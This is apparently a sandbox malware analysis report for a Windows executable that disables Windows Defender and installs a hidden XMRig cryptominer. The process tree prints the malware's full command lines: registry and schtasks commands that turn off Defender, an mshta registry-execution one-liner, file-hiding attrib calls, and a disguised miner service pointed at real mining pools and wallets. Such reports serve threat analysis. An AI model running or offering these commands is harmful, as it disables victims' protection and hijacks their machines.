Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
13-05-2023 20:34
General
-
Target
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe
-
Size
4.1MB
-
MD5
f962628bdeea7557ae61ea61b3e8bd51
-
SHA1
ebec33d67bd123146341e02690637f8a40234f27
-
SHA256
202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f
-
SHA512
51c552e057010c759ead1f4ead26477d14a2190f3f3c620e16dad9d06c37d3f82cc8508ac0e6f0febb1715e241ebabf2ffaa9170540ef376d7b878f0368abcb7
-
SSDEEP
98304:nktEDt0k984nukQYxQFKWRw3hmXsFALcQUkfL3BIdw48phwTpb+:np0k98caxFLRyhulUkD3BIP8b6b+
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\69EA.tmp\69FB.tmp\69FC.bat C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Perform\7za.exe7za.exe x files.7z -aoa -p6H5d75Z8QwgEeQyU3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Perform\update.exeC:\Perform\update.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Perform\Resources\NSudo.exeC:\Perform\Resources\NSudo.exe -U:T -ShowWindowMode:Hide C:\Perform\Resources\Adobe-GenP-2.74⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Perform\up.vbs"3⤵
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\v1Elm0D""), 0, False:close")4⤵
- Checks computer location settings
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --mute-audio --remote-debugging-port=9222 https://palygamesconsutoria.blogspot.com/5⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff9c8b09758,0x7ff9c8b09768,0x7ff9c8b097786⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1396 --field-trial-handle=1412,i,10522659241131663221,15289524562120006187,131072 --disable-features=PaintHolding /prefetch:26⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=1704 --field-trial-handle=1412,i,10522659241131663221,15289524562120006187,131072 --disable-features=PaintHolding /prefetch:86⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=9222 --allow-pre-commit-input --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1932 --field-trial-handle=1412,i,10522659241131663221,15289524562120006187,131072 --disable-features=PaintHolding /prefetch:16⤵
-
-
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\Defender.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\nssm.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Perform\7za.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Perform\nssm.exenssm.exe install "Windows Security" "C:\Perform\Defender.exe" "-r 2 -R 2 --donate-level 1 --cpu-max-threads-hint= 70 -o xmrpool.eu:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p 06 -k -o pool.minexmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o monerohash.com:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o pool.hashvault.pro:5555 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o gulf.moneroocean.stream:10064 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o supportxmr.com:7777 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmr.crypto-pool.fr:8888 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o vegas-backup.xmrpool.net:5557 -u 87nTeyvmqSS7UqYHqacZPKWSvEdvjwLLLest6ZUmAXSkHGyuvrUixpK8HinXP5x4ynNXq8XaAswdDZvwkne4gRtS6ZYdpnG -p x -k -o xmrpool.eu:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o supportxmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o gulf.moneroocean.stream:10064 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k -o pool.minexmr.com:7777 -u 877cao8XfeUiZX5ooqYmcj1Ni8Jw9CwYzWXBGWmZA2Bv5XmcwJRtuYsLRTEzHiAabnQfE3SJx6PrCLAXFP9SE18eLFBkq7a -p x -k"3⤵
- Executes dropped EXE
-
-
C:\Perform\nssm.exenssm.exe set "Windows Security" Start SERVICE_DELAYED_AUTO_START3⤵
- Executes dropped EXE
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
674KB
MD50184e6ebe133ef41a8cc6ef98a263712
SHA1cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA5126fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed
-
Filesize
7.0MB
MD533dcb753b2236649ae2f13d898e8eb5d
SHA1f9be1a9b50b55d9244e20c8ea79ad276854f461c
SHA256f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160
SHA5127a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731
-
Filesize
247KB
MD55cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
Filesize
317KB
MD5bd3b9dac9198c57238d236435bf391ca
SHA1e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA51281216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0
-
Filesize
317KB
MD5bd3b9dac9198c57238d236435bf391ca
SHA1e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA51281216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0
-
Filesize
317KB
MD5bd3b9dac9198c57238d236435bf391ca
SHA1e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA51281216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0
-
Filesize
745B
MD59fc9cd6fff29c03e2b164cafe21543a1
SHA1c348cd40f9e112413a2587ef3036628a056aee13
SHA256b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1
SHA5121362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b
-
Filesize
1.1MB
MD50e4afc55e03f8fe26d82e054004c16a3
SHA1e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA51248c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f
-
Filesize
1.1MB
MD50e4afc55e03f8fe26d82e054004c16a3
SHA1e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA51248c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f
-
Filesize
5KB
MD555f5a5033d59e83f200f78efd8cf9ffd
SHA1b153b8f0da50ffc56996bafa0be0610cec8b9d99
SHA256d7c9417cd55995d45e20bcb9ac046b0f04cf06486d12d689f515af9eaa097041
SHA5129924e373453ad7b415aa6b505c7ad232294f44d68a3d7f8d68414bfacab11fc4678b4a03ed5d172b7f0eab9ef905a9e16e2d42b58ba62d11d1d1697760faf047
-
Filesize
674KB
MD50184e6ebe133ef41a8cc6ef98a263712
SHA1cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA5126fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed
-
Filesize
3.5MB
MD56380cb936d9229799750c4416ad99a81
SHA1d1efa33ab91b12e336190774e616f5e420979201
SHA256f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce
SHA5123139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970